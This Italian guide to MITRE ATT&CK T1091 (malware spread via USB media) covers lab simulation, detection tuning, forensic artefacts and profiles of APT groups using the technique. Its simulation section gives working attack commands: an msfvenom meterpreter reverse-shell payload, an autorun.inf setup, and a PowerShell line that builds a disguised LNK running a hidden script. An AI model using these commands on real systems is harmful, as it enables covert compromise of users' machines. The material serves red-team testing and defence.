Infezione via Supporti Rimovibili: Replication Through Removable Media (T1091)

Simulare T1091 in laboratorio richiede di riprodurre due scenari distinti: la propagazione automatica via Autorun e l'infezione tramite file camuffati che ingannano l'utente. Entrambi sono rilevanti per valutare se i controlli dell'organizzazione resistono alla minaccia fisica.

Scenario 1 — Autorun classico. Su una chiavetta USB formattata, crea un file autorun.inf che punta a un payload. In ambiente di test con Windows 7 o sistemi legacy dove Autorun è ancora abilitato, il principio è semplice: il file .inf istruisce il sistema a eseguire un binario al montaggio del drive. Su sistemi moderni (Windows 10/11) Autorun per dispositivi USB è disabilitato di default, ma AutoPlay può ancora presentare all'utente opzioni ingannevoli. Per generare un payload di test puoi usare msfvenom (open source, parte di Metasploit Framework):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_LAB> LPORT=4444 -f exe -o setup.exe

Copia il binario e l'autorun.inf sulla chiavetta. L'autorun.inf minimo contiene la sezione [autorun] con la direttiva open=setup.exe e opzionalmente un'icona personalizzata per rendere il drive più credibile.

Scenario 2 — LNK weaponizzato. Questo approccio replica la tecnica documentata per Gamaredon Group, che crea file LNK su tutte le unità rimovibili. Con PowerShell puoi generare un collegamento che esegue un comando nascosto:

$ws = New-Object -ComObject WScript.Shell; $sc = $ws.CreateShortcut("E:\Report_Q4.lnk"); $sc.TargetPath = "powershell.exe"; $sc.Arguments = "-ep bypass -windowstyle hidden -file E:\payload.ps1"; $sc.IconLocation = "shell32.dll,1"; $sc.Save()

Il file LNK appare come un documento, ma al doppio clic avvia PowerShell in modalità nascosta. Nascondi il payload reale con l'attributo hidden: attrib +h +s E:\payload.ps1.

Scenario 3 — Rubber Ducky e BadUSB. Per simulare l'approccio di FIN7 (che ha spedito fisicamente chiavette USB malevole), usa un USB Rubber Ducky (a pagamento, Hak5) o una board DigiSpark ATtiny85 (a pagamento, costo minimo). Questi dispositivi emulano una tastiera HID e digitano comandi predefiniti in pochi secondi. L'IDE Arduino (open source) permette di programmare la DigiSpark con script DuckyScript-like. Per un approccio software-only, USBHarpoon è un proof-of-concept documentato che dimostra l'attacco via cavo USB modificato.

Validazione difese. Durante l'engagement, verifica se le ASR rules di Windows Defender bloccano l'esecuzione da drive rimovibili e se le GPO impediscono il montaggio di dispositivi di massa USB non autorizzati. Documenta ogni bypass come finding critico.

La detection di T1091 ruota attorno a un principio cardine: correlare il montaggio di un dispositivo rimovibile con l'esecuzione di codice entro una finestra temporale breve. Un file eseguito da E:\ tre minuti dopo l'inserimento di una chiavetta è molto più sospetto dello stesso file lanciato da C:\Program Files.

La detection principale (DET0301) si basa su tre log source Windows che vanno configurate in modo coordinato. Sysmon è il pilastro: l'EventID 1 (Process Create) cattura il percorso completo dell'immagine, e un filtro sulle lettere di drive tipiche dei rimovibili (E:, F:, G:) identifica immediatamente esecuzioni anomale. L'EventID 11 (FileCreate) sulle stesse lettere rileva la fase di drop del payload. A complemento, il log System nativo di Windows registra l'EventID 7045 per nuovi servizi e il kernel PnP genera eventi al montaggio del dispositivo.

Per il tuning, i dati forniti indicano quattro leve operative:

• DriveLetterMatch: limita il monitoraggio alle lettere non assegnate a unità di rete mappate. In ambienti enterprise, mappa le lettere fisse (Z: per share, N: per NAS) ed escludi quelle dal filtro.
• FileExecutionWindow: una soglia di 5 minuti tra mount e prima esecuzione è un buon punto di partenza. Riducila a 2 minuti per ambienti ad alta sicurezza, aumentala a 10 in contesti dove il personale usa chiavette per trasferimenti autorizzati.
• ParentProcess: concentra gli alert su catene dove il processo padre è explorer.exe (doppio clic utente), powershell.exe o binari non firmati. Un'esecuzione legittima da USB ha quasi sempre explorer.exe come padre, ma il figlio è un installer firmato — non uno script PowerShell offuscato.
• FileEntropy: payload packed o cifrati mostrano entropia elevata (sopra 7.0 su scala 0-8). Tool come pe-sieve (open source) o il modulo di analisi file dell'EDR possono calcolare l'entropia al momento del drop.

Sul fronte preventivo, le ASR rules di Microsoft Defender for Endpoint (incluso in licenze Microsoft 365 E5, a pagamento) offrono una regola specifica che blocca processi non firmati e non trusted eseguiti da supporti rimovibili. Abilitala in modalità audit per due settimane prima di passare a block, così da calibrare le eccezioni.

I falsi positivi più comuni vengono da tecnici IT che usano chiavette con tool di diagnostica portatili e da aggiornamenti firmware che richiedono USB avviabili. Crea una whitelist basata su hash dei binari autorizzati piuttosto che su percorsi, che sono facilmente manipolabili.

L'analisi forense di un'infezione via supporto rimovibile richiede di ricostruire la catena: quando il dispositivo è stato collegato, cosa è stato scritto o eseguito, e verso dove si è propagato il malware. Gli artefatti Windows sono particolarmente ricchi per questa tecnica.

Il punto di partenza è il registro di sistema. La chiave HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contiene l'elenco di tutti i dispositivi di massa USB mai collegati, con Vendor ID, Product ID e numero seriale. Incrocia questi dati con i file setupapi.dev.log (in C:\Windows\inf\) che registrano il timestamp esatto della prima installazione del driver per ogni dispositivo. Su Windows 10/11, il file è setupapi.dev.log, mentre su sistemi più vecchi si trova come setupapi.log.

Per determinare la lettera di drive assegnata, consulta HKLM\SYSTEM\MountedDevices e correla il Device Instance ID con il volume GUID. Il registro utente offre ulteriori informazioni: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 registra i volumi montati per ciascun utente, confermando chi aveva una sessione attiva al momento dell'inserimento.

La ricostruzione della timeline di esecuzione passa attraverso diversi artefatti complementari. I file Prefetch (C:\Windows\Prefetch\) contengono il percorso originale dell'eseguibile: un file .pf che referenzia E:\setup.exe è evidenza diretta di esecuzione da rimovibile. Shellbags nel profilo utente documentano la navigazione nelle cartelle del dispositivo tramite Explorer, fornendo una sequenza temporale delle directory visitate.

Per la tecnica LNK usata da Gamaredon Group, i file collegamento nella cartella Recent dell'utente (%APPDATA%\Microsoft\Windows\Recent) registrano il percorso target originale, il MAC address della macchina dove il LNK è stato creato e i timestamp di creazione/accesso. Questo permette di identificare la macchina sorgente dell'infezione.

Su sistemi dove Sysmon era attivo durante l'incidente, l'EventID 1 nel log Microsoft-Windows-Sysmon/Operational fornisce hash del processo, riga di comando completa e processo padre. L'EventID 11 documenta ogni file creato, inclusi i payload copiati dal dispositivo USB al disco locale — passaggio critico per malware come HIUPAN, che si copia in sottodirectory nascoste sulla chiavetta e poi si installa sul sistema al collegamento successivo.

Per acquisire forensicamente la chiavetta USB stessa, usa FTK Imager (gratuito) per creare un'immagine bit-a-bit. Cerca file con attributi nascosti e di sistema (attrib +h +s), file autorun.inf, e directory con nomi anomali — HIUPAN ad esempio crea path composti da underscore ripetuti. Lo strumento Autopsy (open source) permette di analizzare l'immagine, recuperare file cancellati e visualizzare la struttura del filesystem in modo forense.

La tecnica T1091 è il denominatore comune di operazioni che mirano a superare il confine fisico della rete, e i profili degli 8 gruppi documentati rivelano pattern geografici e operativi ben distinti.

APT28 (G0007) rappresenta il caso emblematico di utilizzo contro reti air-gapped di alto valore. Il gruppo impiega CHOPSTICK come modulo specializzato: il malware si copia su dispositivi USB collegati a macchine compromesse con accesso Internet, poi utilizza file scritti sulla chiavetta per trasferire comandi e dati quando il dispositivo viene inserito nella rete isolata. Questo schema bidirezionale — infezione verso l'air-gap, esfiltrazione verso l'esterno — richiede una pianificazione operativa che indica target di alto profilo e operazioni a lungo termine.

Gamaredon Group (G0047) adotta un approccio diverso, più orientato alla propagazione massiva che alla precisione chirurgica. La creazione automatica di file LNK su tutte le unità rimovibili e di rete, sfruttando la chiave User Assist del registro, trasforma ogni macchina infetta in un vettore di distribuzione. È un meccanismo worm-like che privilegia la copertura sul targeting selettivo, coerente con le operazioni ad alto volume tipiche di questo attore.

FIN7 (G0046) introduce un elemento di social engineering fisico unico nel panorama: la spedizione postale di chiavette USB contenenti backdoor a potenziali vittime, in alcuni casi come parte di operazioni ransomware. L'uso di dispositivi USB che emulano tastiere virtuali (HID attack) eleva la sofisticazione, aggirando controlli che bloccano solo i dispositivi di massa. Questo TTP suggerisce un investimento economico significativo e operazioni mirate contro organizzazioni specifiche.

Mustang Panda (G0129) e Aoqin Dragon (G1007) condividono un focus sull'area Asia-Pacifico e un approccio basato su malware con capacità worm USB integrate. Mustang Panda sfrutta una variante customizzata di PlugX che si propaga via connessioni USB, mentre Aoqin Dragon impiega un dropper con strategia worm specifica per penetrare ambienti di rete sicuri. LuminousMoth (G1014) completa il cluster regionale con DLL malevole che si diffondono automaticamente sui drive USB collegati.

Darkhotel (G0012) e Tropic Trooper (G0081) mostrano varianti tattiche specifiche. Darkhotel modifica selettivamente gli eseguibili già presenti sui supporti rimovibili — un approccio più furtivo che non aggiunge file ma altera quelli esistenti. Tropic Trooper utilizza USBferry, un malware dedicato che sfrutta la funzione Autorun per trasferirsi automaticamente dal dispositivo infetto alla macchina target.

Il pattern complessivo suggerisce che T1091 resta una tecnica privilegiata per colpire infrastrutture critiche, ambienti governativi e reti OT/ICS dove l'isolamento fisico è considerato la difesa primaria. L'overlap di tool è significativo: PlugX compare sia nelle operazioni di Mustang Panda sia come malware standalone con capacità USB, mentre il concetto di Autorun abuse è condiviso da almeno 10 delle 20 famiglie malware documentate.

Framework MITRE ATT&CK v16 — Tecnica T1091, Tattiche TA0001 e TA0008, Detection DET0301 (AN0841). Gruppi: G0047, G1014, G1007, G0012, G0129, G0046, G0007, G0081. Software: S0143, S0028, S1230, S0013, S0130, S0062, S0132, S0603, S1130, S0092, S0385, S0452, S0023, S0115, S0458, S0650, S1074, S0136, S0608, S0386. Mitigazioni: M1042, M1034, M1040. Integrato con conoscenza professionale per tool e procedure operative.